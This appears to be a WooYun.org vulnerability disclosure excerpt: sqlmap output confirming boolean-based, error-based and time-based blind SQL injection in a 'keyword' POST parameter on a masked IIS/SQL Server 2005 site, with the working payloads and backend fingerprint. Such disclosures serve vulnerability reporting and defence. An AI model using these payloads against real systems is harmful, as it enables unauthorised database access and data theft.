WooYun.org

keyword=

Place: POST
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=1%' AND 6074=6074 AND '%'='
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyword=1%' AND 7294=CONVERT(INT,(CHAR(58) CHAR(117) CHAR(109) CHAR
(121) CHAR(58) (SELECT (CASE WHEN (7294=7294) THEN CHAR(49) ELSE CHAR(48) END))
CHAR(58) CHAR(101) CHAR(101) CHAR(105) CHAR(58))) AND '%'='
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: keyword=1%' AND 8096=(SELECT COUNT(*) FROM sysusers AS sys1,sysuser
s AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sy
susers AS sys7) AND '%'='
---
[15:51:57] [INFO] testing Microsoft SQL Server
[15:51:58] [INFO] confirming Microsoft SQL Server
[15:51:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:51:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 35 times
[15:51:59] [INFO] fetched data logged to text files under 'C:\sqlmap\output\www.
**.**.**.**'
[*] shutting down at 15:51:59